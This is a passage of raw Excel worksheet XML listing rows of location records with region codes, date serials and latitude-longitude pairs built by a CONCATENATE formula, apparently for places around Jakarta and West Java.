      <c r="D707" t="s">
        <v>2648</v>
      </c>
      <c r="E707" t="s">
        <v>23</v>
      </c>
      <c r="G707" t="s">
        <v>2890</v>
      </c>
      <c r="H707" t="s">
        <v>26</v>
      </c>
      <c r="J707" t="s">
        <v>138</v>
      </c>
      <c r="L707" t="s">
        <v>2891</v>
      </c>
      <c r="M707">
        <v>3172080005</v>
      </c>
      <c r="N707">
        <v>3172080</v>
      </c>
      <c r="O707">
        <v>3172</v>
      </c>
      <c r="P707">
        <v>31</v>
      </c>
      <c r="Q707" t="s">
        <v>140</v>
      </c>
      <c r="R707" t="s">
        <v>141</v>
      </c>
      <c r="S707" t="s">
        <v>49</v>
      </c>
      <c r="T707" t="s">
        <v>33</v>
      </c>
      <c r="U707" s="5">
        <v>10695043</v>
      </c>
      <c r="V707" s="5" t="s">
        <v>15110</v>
      </c>
      <c r="W707" s="5">
        <v>-617122</v>
      </c>
      <c r="X707" t="s">
        <v>18915</v>
      </c>
      <c r="Y707" t="str">
        <f t="shared" ref="Y707:Y770" si="11">CONCATENATE(X707,",",V707)</f>
        <v>-6.17122,106.95043</v>
      </c>
    </row>
    <row r="708" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A708">
        <v>109582</v>
      </c>
      <c r="B708" s="1">
        <v>43877</v>
      </c>
      <c r="C708">
        <v>1</v>
      </c>
      <c r="D708" t="s">
        <v>2648</v>
      </c>
      <c r="E708" t="s">
        <v>23</v>
      </c>
      <c r="G708" t="s">
        <v>2892</v>
      </c>
      <c r="H708" t="s">
        <v>26</v>
      </c>
      <c r="J708" t="s">
        <v>2874</v>
      </c>
      <c r="L708" t="s">
        <v>2794</v>
      </c>
      <c r="M708">
        <v>3175010004</v>
      </c>
      <c r="N708">
        <v>3175010</v>
      </c>
      <c r="O708">
        <v>3175</v>
      </c>
      <c r="P708">
        <v>31</v>
      </c>
      <c r="Q708" t="s">
        <v>546</v>
      </c>
      <c r="R708" t="s">
        <v>546</v>
      </c>
      <c r="S708" t="s">
        <v>547</v>
      </c>
      <c r="T708" t="s">
        <v>33</v>
      </c>
      <c r="U708" s="5">
        <v>10679915</v>
      </c>
      <c r="V708" s="5" t="s">
        <v>15111</v>
      </c>
      <c r="W708" s="5">
        <v>-612797</v>
      </c>
      <c r="X708" t="s">
        <v>18916</v>
      </c>
      <c r="Y708" t="str">
        <f t="shared" si="11"/>
        <v>-6.12797,106.79915</v>
      </c>
    </row>
    <row r="709" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A709">
        <v>109583</v>
      </c>
      <c r="B709" s="1">
        <v>43877</v>
      </c>
      <c r="C709">
        <v>1</v>
      </c>
      <c r="D709" t="s">
        <v>2648</v>
      </c>
      <c r="E709" t="s">
        <v>23</v>
      </c>
      <c r="G709" t="s">
        <v>2893</v>
      </c>
      <c r="H709" t="s">
        <v>26</v>
      </c>
      <c r="J709" t="s">
        <v>2894</v>
      </c>
      <c r="L709" t="s">
        <v>2895</v>
      </c>
      <c r="M709">
        <v>3172050003</v>
      </c>
      <c r="N709">
        <v>3172050</v>
      </c>
      <c r="O709">
        <v>3172</v>
      </c>
      <c r="P709">
        <v>31</v>
      </c>
      <c r="Q709" t="s">
        <v>2896</v>
      </c>
      <c r="R709" t="s">
        <v>358</v>
      </c>
      <c r="S709" t="s">
        <v>49</v>
      </c>
      <c r="T709" t="s">
        <v>33</v>
      </c>
      <c r="U709" s="5">
        <v>10686551</v>
      </c>
      <c r="V709" s="5" t="s">
        <v>15112</v>
      </c>
      <c r="W709" s="5">
        <v>-628585</v>
      </c>
      <c r="X709" t="s">
        <v>18917</v>
      </c>
      <c r="Y709" t="str">
        <f t="shared" si="11"/>
        <v>-6.28585,106.86551</v>
      </c>
    </row>
    <row r="710" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A710">
        <v>109584</v>
      </c>
      <c r="B710" s="1">
        <v>43877</v>
      </c>
      <c r="C710">
        <v>1</v>
      </c>
      <c r="D710" t="s">
        <v>2648</v>
      </c>
      <c r="E710" t="s">
        <v>23</v>
      </c>
      <c r="G710" t="s">
        <v>2897</v>
      </c>
      <c r="H710" t="s">
        <v>26</v>
      </c>
      <c r="J710" t="s">
        <v>2341</v>
      </c>
      <c r="L710" t="s">
        <v>2898</v>
      </c>
      <c r="M710">
        <v>3172070006</v>
      </c>
      <c r="N710">
        <v>3172070</v>
      </c>
      <c r="O710">
        <v>3172</v>
      </c>
      <c r="P710">
        <v>31</v>
      </c>
      <c r="Q710" t="s">
        <v>2342</v>
      </c>
      <c r="R710" t="s">
        <v>128</v>
      </c>
      <c r="S710" t="s">
        <v>49</v>
      </c>
      <c r="T710" t="s">
        <v>33</v>
      </c>
      <c r="U710" s="5">
        <v>10692936</v>
      </c>
      <c r="V710" s="5" t="s">
        <v>15113</v>
      </c>
      <c r="W710" s="5">
        <v>-623181</v>
      </c>
      <c r="X710" t="s">
        <v>18603</v>
      </c>
      <c r="Y710" t="str">
        <f t="shared" si="11"/>
        <v>-6.23181,106.92936</v>
      </c>
    </row>
    <row r="711" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A711">
        <v>109585</v>
      </c>
      <c r="B711" s="1">
        <v>43877</v>
      </c>
      <c r="C711">
        <v>1</v>
      </c>
      <c r="D711" t="s">
        <v>2648</v>
      </c>
      <c r="E711" t="s">
        <v>23</v>
      </c>
      <c r="G711" t="s">
        <v>2899</v>
      </c>
      <c r="H711" t="s">
        <v>26</v>
      </c>
      <c r="J711" t="s">
        <v>563</v>
      </c>
      <c r="L711" t="s">
        <v>2900</v>
      </c>
      <c r="M711">
        <v>3174010005</v>
      </c>
      <c r="N711">
        <v>3174010</v>
      </c>
      <c r="O711">
        <v>3174</v>
      </c>
      <c r="P711">
        <v>31</v>
      </c>
      <c r="Q711" t="s">
        <v>251</v>
      </c>
      <c r="R711" t="s">
        <v>69</v>
      </c>
      <c r="S711" t="s">
        <v>32</v>
      </c>
      <c r="T711" t="s">
        <v>33</v>
      </c>
      <c r="U711" s="5">
        <v>10675696</v>
      </c>
      <c r="V711" s="5" t="s">
        <v>15114</v>
      </c>
      <c r="W711" s="5">
        <v>-618715</v>
      </c>
      <c r="X711" t="s">
        <v>18304</v>
      </c>
      <c r="Y711" t="str">
        <f t="shared" si="11"/>
        <v>-6.18715,106.75696</v>
      </c>
    </row>
    <row r="712" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A712">
        <v>109586</v>
      </c>
      <c r="B712" s="1">
        <v>43877</v>
      </c>
      <c r="C712">
        <v>1</v>
      </c>
      <c r="D712" t="s">
        <v>2648</v>
      </c>
      <c r="E712" t="s">
        <v>23</v>
      </c>
      <c r="G712" t="s">
        <v>2901</v>
      </c>
      <c r="H712" t="s">
        <v>26</v>
      </c>
      <c r="J712" t="s">
        <v>2902</v>
      </c>
      <c r="L712" t="s">
        <v>2903</v>
      </c>
      <c r="M712">
        <v>3172020003</v>
      </c>
      <c r="N712">
        <v>3172020</v>
      </c>
      <c r="O712">
        <v>3172</v>
      </c>
      <c r="P712">
        <v>31</v>
      </c>
      <c r="Q712" t="s">
        <v>1644</v>
      </c>
      <c r="R712" t="s">
        <v>1644</v>
      </c>
      <c r="S712" t="s">
        <v>49</v>
      </c>
      <c r="T712" t="s">
        <v>33</v>
      </c>
      <c r="U712" s="5">
        <v>10688027</v>
      </c>
      <c r="V712" s="5" t="s">
        <v>15115</v>
      </c>
      <c r="W712" s="5">
        <v>-631847</v>
      </c>
      <c r="X712" t="s">
        <v>18918</v>
      </c>
      <c r="Y712" t="str">
        <f t="shared" si="11"/>
        <v>-6.31847,106.88027</v>
      </c>
    </row>
    <row r="713" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A713">
        <v>109587</v>
      </c>
      <c r="B713" s="1">
        <v>43877</v>
      </c>
      <c r="C713">
        <v>1</v>
      </c>
      <c r="D713" t="s">
        <v>2648</v>
      </c>
      <c r="E713" t="s">
        <v>23</v>
      </c>
      <c r="G713" t="s">
        <v>2904</v>
      </c>
      <c r="H713" t="s">
        <v>26</v>
      </c>
      <c r="J713" t="s">
        <v>2905</v>
      </c>
      <c r="L713" t="s">
        <v>2906</v>
      </c>
      <c r="M713">
        <v>3171090005</v>
      </c>
      <c r="N713">
        <v>3171090</v>
      </c>
      <c r="O713">
        <v>3171</v>
      </c>
      <c r="P713">
        <v>31</v>
      </c>
      <c r="Q713" t="s">
        <v>1300</v>
      </c>
      <c r="R713" t="s">
        <v>347</v>
      </c>
      <c r="S713" t="s">
        <v>108</v>
      </c>
      <c r="T713" t="s">
        <v>33</v>
      </c>
      <c r="U713" s="5">
        <v>10685985</v>
      </c>
      <c r="V713" s="5" t="s">
        <v>15116</v>
      </c>
      <c r="W713" s="5">
        <v>-622111</v>
      </c>
      <c r="X713" t="s">
        <v>18919</v>
      </c>
      <c r="Y713" t="str">
        <f t="shared" si="11"/>
        <v>-6.22111,106.85985</v>
      </c>
    </row>
    <row r="714" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A714">
        <v>109588</v>
      </c>
      <c r="B714" s="1">
        <v>43877</v>
      </c>
      <c r="C714">
        <v>1</v>
      </c>
      <c r="D714" t="s">
        <v>2648</v>
      </c>
      <c r="E714" t="s">
        <v>23</v>
      </c>
      <c r="G714" t="s">
        <v>2907</v>
      </c>
      <c r="H714" t="s">
        <v>26</v>
      </c>
      <c r="J714" t="s">
        <v>2627</v>
      </c>
      <c r="L714" t="s">
        <v>2908</v>
      </c>
      <c r="M714">
        <v>3275061004</v>
      </c>
      <c r="N714">
        <v>3275061</v>
      </c>
      <c r="O714">
        <v>3275</v>
      </c>
      <c r="P714">
        <v>32</v>
      </c>
      <c r="Q714" t="s">
        <v>39</v>
      </c>
      <c r="R714" t="s">
        <v>40</v>
      </c>
      <c r="S714" t="s">
        <v>41</v>
      </c>
      <c r="T714" t="s">
        <v>42</v>
      </c>
      <c r="U714" s="5">
        <v>10699215</v>
      </c>
      <c r="V714" s="5" t="s">
        <v>15117</v>
      </c>
      <c r="W714" s="5">
        <v>-618838</v>
      </c>
      <c r="X714" t="s">
        <v>18868</v>
      </c>
      <c r="Y714" t="str">
        <f t="shared" si="11"/>
        <v>-6.18838,106.99215</v>
      </c>
    </row>
    <row r="715" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A715">
        <v>109589</v>
      </c>
      <c r="B715" s="1">
        <v>43877</v>
      </c>
      <c r="C715">
        <v>1</v>
      </c>
      <c r="D715" t="s">
        <v>2648</v>
      </c>
      <c r="E715" t="s">
        <v>23</v>
      </c>
      <c r="G715" t="s">
        <v>2909</v>
      </c>
      <c r="H715" t="s">
        <v>26</v>
      </c>
      <c r="J715" t="s">
        <v>2580</v>
      </c>
      <c r="L715" t="s">
        <v>2910</v>
      </c>
      <c r="M715">
        <v>3172040005</v>
      </c>
      <c r="N715">
        <v>3172040</v>
      </c>
      <c r="O715">
        <v>3172</v>
      </c>
      <c r="P715">
        <v>31</v>
      </c>
      <c r="Q715" t="s">
        <v>1351</v>
      </c>
      <c r="R715" t="s">
        <v>281</v>
      </c>
      <c r="S715" t="s">
        <v>49</v>
      </c>
      <c r="T715" t="s">
        <v>33</v>
      </c>
      <c r="U715" s="5">
        <v>10689375</v>
      </c>
      <c r="V715" s="5" t="s">
        <v>15118</v>
      </c>
      <c r="W715" s="5">
        <v>-624112</v>
      </c>
      <c r="X715" t="s">
        <v>18920</v>
      </c>
      <c r="Y715" t="str">
        <f t="shared" si="11"/>
        <v>-6.24112,106.89375</v>
      </c>
    </row>
    <row r="716" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A716">
        <v>109590</v>
      </c>
      <c r="B716" s="1">
        <v>43877</v>
      </c>
      <c r="C716">
        <v>1</v>
      </c>
      <c r="D716" t="s">
        <v>2648</v>
      </c>
      <c r="E716" t="s">
        <v>23</v>
      </c>
      <c r="G716" t="s">
        <v>2911</v>
      </c>
      <c r="H716" t="s">
        <v>26</v>
      </c>
      <c r="J716" t="s">
        <v>2912</v>
      </c>
      <c r="L716" t="s">
        <v>2913</v>
      </c>
      <c r="M716">
        <v>3172040001</v>
      </c>
      <c r="N716">
        <v>3172040</v>
      </c>
      <c r="O716">
        <v>3172</v>
      </c>
      <c r="P716">
        <v>31</v>
      </c>
      <c r="Q716" t="s">
        <v>2914</v>
      </c>
      <c r="R716" t="s">
        <v>281</v>
      </c>
      <c r="S716" t="s">
        <v>49</v>
      </c>
      <c r="T716" t="s">
        <v>33</v>
      </c>
      <c r="U716" s="5">
        <v>10688896</v>
      </c>
      <c r="V716" s="5" t="s">
        <v>15119</v>
      </c>
      <c r="W716" s="5">
        <v>-629507</v>
      </c>
      <c r="X716" t="s">
        <v>18921</v>
      </c>
      <c r="Y716" t="str">
        <f t="shared" si="11"/>
        <v>-6.29507,106.88896</v>
      </c>
    </row>
    <row r="717" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A717">
        <v>109591</v>
      </c>
      <c r="B717" s="1">
        <v>43877</v>
      </c>
      <c r="C717">
        <v>1</v>
      </c>
      <c r="D717" t="s">
        <v>2648</v>
      </c>
      <c r="E717" t="s">
        <v>23</v>
      </c>
      <c r="G717" t="s">
        <v>2915</v>
      </c>
      <c r="H717" t="s">
        <v>26</v>
      </c>
      <c r="J717" t="s">
        <v>2916</v>
      </c>
      <c r="L717" t="s">
        <v>2917</v>
      </c>
      <c r="M717">
        <v>3172040003</v>
      </c>
      <c r="N717">
        <v>3172040</v>
      </c>
      <c r="O717">
        <v>3172</v>
      </c>
      <c r="P717">
        <v>31</v>
      </c>
      <c r="Q717" t="s">
        <v>552</v>
      </c>
      <c r="R717" t="s">
        <v>281</v>
      </c>
      <c r="S717" t="s">
        <v>49</v>
      </c>
      <c r="T717" t="s">
        <v>33</v>
      </c>
      <c r="U717" s="5">
        <v>10688195</v>
      </c>
      <c r="V717" s="5" t="s">
        <v>15120</v>
      </c>
      <c r="W717" s="5">
        <v>-626258</v>
      </c>
      <c r="X717" t="s">
        <v>18922</v>
      </c>
      <c r="Y717" t="str">
        <f t="shared" si="11"/>
        <v>-6.26258,106.88195</v>
      </c>
    </row>
    <row r="718" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A718">
        <v>109592</v>
      </c>
      <c r="B718" s="1">
        <v>43877</v>
      </c>
      <c r="C718">
        <v>1</v>
      </c>
      <c r="D718" t="s">
        <v>2648</v>
      </c>
      <c r="E718" t="s">
        <v>23</v>
      </c>
      <c r="G718" t="s">
        <v>2918</v>
      </c>
      <c r="H718" t="s">
        <v>26</v>
      </c>
      <c r="J718" t="s">
        <v>2919</v>
      </c>
      <c r="L718" t="s">
        <v>2920</v>
      </c>
      <c r="M718">
        <v>3172090004</v>
      </c>
      <c r="N718">
        <v>3172090</v>
      </c>
      <c r="O718">
        <v>3172</v>
      </c>
      <c r="P718">
        <v>31</v>
      </c>
      <c r="Q718" t="s">
        <v>889</v>
      </c>
      <c r="R718" t="s">
        <v>890</v>
      </c>
      <c r="S718" t="s">
        <v>49</v>
      </c>
      <c r="T718" t="s">
        <v>33</v>
      </c>
      <c r="U718" s="5">
        <v>10689644</v>
      </c>
      <c r="V718" s="5" t="s">
        <v>15121</v>
      </c>
      <c r="W718" s="5">
        <v>-619856</v>
      </c>
      <c r="X718" t="s">
        <v>18923</v>
      </c>
      <c r="Y718" t="str">
        <f t="shared" si="11"/>
        <v>-6.19856,106.89644</v>
      </c>
    </row>
    <row r="719" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A719">
        <v>109676</v>
      </c>
      <c r="B719" s="1">
        <v>43877</v>
      </c>
      <c r="C719">
        <v>1</v>
      </c>
      <c r="D719" t="s">
        <v>2648</v>
      </c>
      <c r="E719" t="s">
        <v>23</v>
      </c>
      <c r="G719" t="s">
        <v>2921</v>
      </c>
      <c r="H719" t="s">
        <v>26</v>
      </c>
      <c r="J719" t="s">
        <v>2679</v>
      </c>
      <c r="L719" t="s">
        <v>2922</v>
      </c>
      <c r="M719">
        <v>3172090001</v>
      </c>
      <c r="N719">
        <v>3172090</v>
      </c>
      <c r="O719">
        <v>3172</v>
      </c>
      <c r="P719">
        <v>31</v>
      </c>
      <c r="Q719" t="s">
        <v>2681</v>
      </c>
      <c r="R719" t="s">
        <v>890</v>
      </c>
      <c r="S719" t="s">
        <v>49</v>
      </c>
      <c r="T719" t="s">
        <v>33</v>
      </c>
      <c r="U719" s="5">
        <v>10687637</v>
      </c>
      <c r="V719" s="5" t="s">
        <v>15038</v>
      </c>
      <c r="W719" s="5">
        <v>-620738</v>
      </c>
      <c r="X719" t="s">
        <v>18850</v>
      </c>
      <c r="Y719" t="str">
        <f t="shared" si="11"/>
        <v>-6.20738,106.87637</v>
      </c>
    </row>
    <row r="720" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A720">
        <v>109678</v>
      </c>
      <c r="B720" s="1">
        <v>43877</v>
      </c>
      <c r="C720">
        <v>1</v>
      </c>
      <c r="D720" t="s">
        <v>2648</v>
      </c>
      <c r="E720" t="s">
        <v>23</v>
      </c>
      <c r="G720" t="s">
        <v>2923</v>
      </c>
      <c r="H720" t="s">
        <v>26</v>
      </c>
      <c r="J720" t="s">
        <v>2679</v>
      </c>
      <c r="L720" t="s">
        <v>2924</v>
      </c>
      <c r="M720">
        <v>3172090001</v>
      </c>
      <c r="N720">
        <v>3172090</v>
      </c>
      <c r="O720">
        <v>3172</v>
      </c>
      <c r="P720">
        <v>31</v>
      </c>
      <c r="Q720" t="s">
        <v>2681</v>
      </c>
      <c r="R720" t="s">
        <v>890</v>
      </c>
      <c r="S720" t="s">
        <v>49</v>
      </c>
      <c r="T720" t="s">
        <v>33</v>
      </c>
      <c r="U720" s="5">
        <v>10687637</v>
      </c>
      <c r="V720" s="5" t="s">
        <v>15038</v>
      </c>
      <c r="W720" s="5">
        <v>-620737</v>
      </c>
      <c r="X720" t="s">
        <v>18843</v>
      </c>
      <c r="Y720" t="str">
        <f t="shared" si="11"/>
        <v>-6.20737,106.87637</v>
      </c>
    </row>
    <row r="721" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A721">
        <v>110044</v>
      </c>
      <c r="B721" s="1">
        <v>43877</v>
      </c>
      <c r="C721">
        <v>1</v>
      </c>
      <c r="D721" t="s">
        <v>2648</v>
      </c>
      <c r="E721" t="s">
        <v>23</v>
      </c>
      <c r="G721" t="s">
        <v>2925</v>
      </c>
      <c r="H721" t="s">
        <v>26</v>
      </c>
      <c r="J721" t="s">
        <v>2926</v>
      </c>
      <c r="L721" t="s">
        <v>2927</v>
      </c>
      <c r="M721">
        <v>3175060004</v>
      </c>
      <c r="N721">
        <v>3175060</v>
      </c>
      <c r="O721">
        <v>3175</v>
      </c>
      <c r="P721">
        <v>31</v>
      </c>
      <c r="Q721" t="s">
        <v>2279</v>
      </c>
      <c r="R721" t="s">
        <v>2279</v>
      </c>
      <c r="S721" t="s">
        <v>547</v>
      </c>
      <c r="T721" t="s">
        <v>33</v>
      </c>
      <c r="U721" s="5">
        <v>10693919</v>
      </c>
      <c r="V721" s="5" t="s">
        <v>15122</v>
      </c>
      <c r="W721" s="5">
        <v>-610246</v>
      </c>
      <c r="X721" t="s">
        <v>18924</v>
      </c>
      <c r="Y721" t="str">
        <f t="shared" si="11"/>
        <v>-6.10246,106.93919</v>
      </c>
    </row>
    <row r="722" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A722">
        <v>110047</v>
      </c>
      <c r="B722" s="1">
        <v>43877</v>
      </c>
      <c r="C722">
        <v>1</v>
      </c>
      <c r="D722" t="s">
        <v>2648</v>
      </c>
      <c r="E722" t="s">
        <v>23</v>
      </c>
      <c r="G722" t="s">
        <v>2928</v>
      </c>
      <c r="H722" t="s">
        <v>26</v>
      </c>
      <c r="J722" t="s">
        <v>2929</v>
      </c>
      <c r="L722" t="s">
        <v>2930</v>
      </c>
      <c r="M722">
        <v>3172090002</v>
      </c>
      <c r="N722">
        <v>3172090</v>
      </c>
      <c r="O722">
        <v>3172</v>
      </c>
      <c r="P722">
        <v>31</v>
      </c>
      <c r="Q722" t="s">
        <v>2931</v>
      </c>
      <c r="R722" t="s">
        <v>890</v>
      </c>
      <c r="S722" t="s">
        <v>49</v>
      </c>
      <c r="T722" t="s">
        <v>33</v>
      </c>
      <c r="U722" s="5">
        <v>10688947</v>
      </c>
      <c r="V722" s="5" t="s">
        <v>15123</v>
      </c>
      <c r="W722" s="5">
        <v>-620221</v>
      </c>
      <c r="X722" t="s">
        <v>18925</v>
      </c>
      <c r="Y722" t="str">
        <f t="shared" si="11"/>
        <v>-6.20221,106.88947</v>
      </c>
    </row>
    <row r="723" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A723">
        <v>110050</v>
      </c>
      <c r="B723" s="1">
        <v>43877</v>
      </c>
      <c r="C723">
        <v>1</v>
      </c>
      <c r="D723" t="s">
        <v>2648</v>
      </c>
      <c r="E723" t="s">
        <v>23</v>
      </c>
      <c r="G723" t="s">
        <v>2932</v>
      </c>
      <c r="H723" t="s">
        <v>26</v>
      </c>
      <c r="J723" t="s">
        <v>2933</v>
      </c>
      <c r="L723" t="s">
        <v>2934</v>
      </c>
      <c r="M723">
        <v>3171100006</v>
      </c>
      <c r="N723">
        <v>3171100</v>
      </c>
      <c r="O723">
        <v>3171</v>
      </c>
      <c r="P723">
        <v>31</v>
      </c>
      <c r="Q723" t="s">
        <v>1121</v>
      </c>
      <c r="R723" t="s">
        <v>107</v>
      </c>
      <c r="S723" t="s">
        <v>108</v>
      </c>
      <c r="T723" t="s">
        <v>33</v>
      </c>
      <c r="U723" s="5">
        <v>10683842</v>
      </c>
      <c r="V723" s="5" t="s">
        <v>15124</v>
      </c>
      <c r="W723" s="5">
        <v>-620878</v>
      </c>
      <c r="X723" t="s">
        <v>18926</v>
      </c>
      <c r="Y723" t="str">
        <f t="shared" si="11"/>
        <v>-6.20878,106.83842</v>
      </c>
    </row>
    <row r="724" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A724">
        <v>110051</v>
      </c>
      <c r="B724" s="1">
        <v>43877</v>
      </c>
      <c r="C724">
        <v>1</v>
      </c>
      <c r="D724" t="s">
        <v>2648</v>
      </c>
      <c r="E724" t="s">
        <v>23</v>
      </c>
      <c r="G724" t="s">
        <v>2935</v>
      </c>
      <c r="H724" t="s">
        <v>26</v>
      </c>
      <c r="J724" t="s">
        <v>138</v>
      </c>
      <c r="L724" t="s">
        <v>2936</v>
      </c>
      <c r="M724">
        <v>3172080005</v>
      </c>
      <c r="N724">
        <v>3172080</v>
      </c>
      <c r="O724">
        <v>3172</v>
      </c>
      <c r="P724">
        <v>31</v>
      </c>
      <c r="Q724" t="s">
        <v>140</v>
      </c>
      <c r="R724" t="s">
        <v>141</v>
      </c>
      <c r="S724" t="s">
        <v>49</v>
      </c>
      <c r="T724" t="s">
        <v>33</v>
      </c>
      <c r="U724" s="5">
        <v>10695105</v>
      </c>
      <c r="V724" s="5" t="s">
        <v>15125</v>
      </c>
      <c r="W724" s="5">
        <v>-617004</v>
      </c>
      <c r="X724" t="s">
        <v>18927</v>
      </c>
      <c r="Y724" t="str">
        <f t="shared" si="11"/>
        <v>-6.17004,106.95105</v>
      </c>
    </row>
    <row r="725" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A725">
        <v>110054</v>
      </c>
      <c r="B725" s="1">
        <v>43877</v>
      </c>
      <c r="C725">
        <v>1</v>
      </c>
      <c r="D725" t="s">
        <v>2648</v>
      </c>
      <c r="E725" t="s">
        <v>23</v>
      </c>
      <c r="G725" t="s">
        <v>2937</v>
      </c>
      <c r="H725" t="s">
        <v>26</v>
      </c>
      <c r="J725" t="s">
        <v>1297</v>
      </c>
      <c r="L725" t="s">
        <v>2938</v>
      </c>
      <c r="M725">
        <v>3171090005</v>
      </c>
      <c r="N725">
        <v>3171090</v>
      </c>
      <c r="O725">
        <v>3171</v>
      </c>
      <c r="P725">
        <v>31</v>
      </c>
      <c r="Q725" t="s">
        <v>1300</v>
      </c>
      <c r="R725" t="s">
        <v>347</v>
      </c>
      <c r="S725" t="s">
        <v>108</v>
      </c>
      <c r="T725" t="s">
        <v>33</v>
      </c>
      <c r="U725" s="5">
        <v>10686005</v>
      </c>
      <c r="V725" s="5" t="s">
        <v>15126</v>
      </c>
      <c r="W725" s="5">
        <v>-622081</v>
      </c>
      <c r="X725" t="s">
        <v>18928</v>
      </c>
      <c r="Y725" t="str">
        <f t="shared" si="11"/>
        <v>-6.22081,106.86005</v>
      </c>
    </row>
    <row r="726" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A726">
        <v>110063</v>
      </c>
      <c r="B726" s="1">
        <v>43877</v>
      </c>
      <c r="C726">
        <v>1</v>
      </c>
      <c r="D726" t="s">
        <v>2648</v>
      </c>
      <c r="E726" t="s">
        <v>23</v>
      </c>
      <c r="G726" t="s">
        <v>2939</v>
      </c>
      <c r="H726" t="s">
        <v>26</v>
      </c>
      <c r="J726" t="s">
        <v>2940</v>
      </c>
      <c r="L726" t="s">
        <v>2941</v>
      </c>
      <c r="M726">
        <v>3175060001</v>
      </c>
      <c r="N726">
        <v>3175060</v>
      </c>
      <c r="O726">
        <v>3175</v>
      </c>
      <c r="P726">
        <v>31</v>
      </c>
      <c r="Q726" t="s">
        <v>2278</v>
      </c>
      <c r="R726" t="s">
        <v>2279</v>
      </c>
      <c r="S726" t="s">
        <v>547</v>
      </c>
      <c r="T726" t="s">
        <v>33</v>
      </c>
      <c r="U726" s="5">
        <v>10693715</v>
      </c>
      <c r="V726" s="5" t="s">
        <v>15127</v>
      </c>
      <c r="W726" s="5">
        <v>-614909</v>
      </c>
      <c r="X726" t="s">
        <v>18929</v>
      </c>
      <c r="Y726" t="str">
        <f t="shared" si="11"/>
        <v>-6.14909,106.93715</v>
      </c>
    </row>
    <row r="727" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A727">
        <v>105849</v>
      </c>
      <c r="B727" s="1">
        <v>43878</v>
      </c>
      <c r="C727">
        <v>0</v>
      </c>
      <c r="D727" t="s">
        <v>85</v>
      </c>
      <c r="E727" t="s">
        <v>23</v>
      </c>
      <c r="F727" t="s">
        <v>2942</v>
      </c>
      <c r="G727" t="s">
        <v>2943</v>
      </c>
      <c r="H727" t="s">
        <v>26</v>
      </c>
      <c r="J727" t="s">
        <v>2627</v>
      </c>
      <c r="K727" t="s">
        <v>2944</v>
      </c>
      <c r="L727" t="s">
        <v>2945</v>
      </c>
      <c r="M727">
        <v>3216071010</v>
      </c>
      <c r="N727">
        <v>3216071</v>
      </c>
      <c r="O727">
        <v>3216</v>
      </c>
      <c r="P727">
        <v>32</v>
      </c>
      <c r="Q727" t="s">
        <v>2946</v>
      </c>
      <c r="R727" t="s">
        <v>2013</v>
      </c>
      <c r="S727" t="s">
        <v>41</v>
      </c>
      <c r="T727" t="s">
        <v>42</v>
      </c>
      <c r="U727" s="5">
        <v>10711089</v>
      </c>
      <c r="V727" s="5" t="s">
        <v>15128</v>
      </c>
      <c r="W727" s="5">
        <v>-627153</v>
      </c>
      <c r="X727" t="s">
        <v>18537</v>
      </c>
      <c r="Y727" t="str">
        <f t="shared" si="11"/>
        <v>-6.27153,107.11089</v>
      </c>
    </row>
    <row r="728" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A728">
        <v>105851</v>
      </c>
      <c r="B728" s="1">
        <v>43878</v>
      </c>
      <c r="C728">
        <v>0</v>
      </c>
      <c r="D728" t="s">
        <v>85</v>
      </c>
      <c r="E728" t="s">
        <v>23</v>
      </c>
      <c r="F728" t="s">
        <v>2947</v>
      </c>
      <c r="G728" t="s">
        <v>2948</v>
      </c>
      <c r="H728" t="s">
        <v>26</v>
      </c>
      <c r="J728" t="s">
        <v>2627</v>
      </c>
      <c r="K728" t="s">
        <v>2949</v>
      </c>
      <c r="L728" t="s">
        <v>2950</v>
      </c>
      <c r="M728">
        <v>3211010009</v>
      </c>
      <c r="N728">
        <v>3211010</v>
      </c>
      <c r="O728">
        <v>3211</v>
      </c>
      <c r="P728">
        <v>32</v>
      </c>
      <c r="Q728" t="s">
        <v>2951</v>
      </c>
      <c r="R728" t="s">
        <v>2952</v>
      </c>
      <c r="S728" t="s">
        <v>1797</v>
      </c>
      <c r="T728" t="s">
        <v>42</v>
      </c>
      <c r="U728" s="5">
        <v>10777668</v>
      </c>
      <c r="V728" s="5" t="s">
        <v>15129</v>
      </c>
      <c r="W728" s="5">
        <v>-694315</v>
      </c>
      <c r="X728" t="s">
        <v>18930</v>
      </c>
      <c r="Y728" t="str">
        <f t="shared" si="11"/>
        <v>-6.94315,107.77668</v>
      </c>
    </row>
    <row r="729" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A729">
        <v>105852</v>
      </c>
      <c r="B729" s="1">
        <v>43878</v>
      </c>
      <c r="C729">
        <v>0</v>
      </c>
      <c r="D729" t="s">
        <v>22</v>
      </c>
      <c r="E729" t="s">
        <v>23</v>
      </c>
      <c r="F729" t="s">
        <v>2953</v>
      </c>
      <c r="H729" t="s">
        <v>26</v>
      </c>
      <c r="I729" t="s">
        <v>974</v>
      </c>
      <c r="J729" t="s">
        <v>2627</v>
      </c>
      <c r="L729" t="s">
        <v>2954</v>
      </c>
      <c r="M729">
        <v>3204260004</v>
      </c>
      <c r="N729">
        <v>3204260</v>
      </c>
      <c r="O729">
        <v>3204</v>
      </c>
      <c r="P729">
        <v>32</v>
      </c>
      <c r="Q729" t="s">
        <v>2955</v>
      </c>
      <c r="R729" t="s">
        <v>2956</v>
      </c>
      <c r="S729" t="s">
        <v>1464</v>
      </c>
      <c r="T729" t="s">
        <v>42</v>
      </c>
      <c r="U729" s="5">
        <v>10757309</v>
      </c>
      <c r="V729" s="5" t="s">
        <v>15130</v>
      </c>
      <c r="W729" s="5">
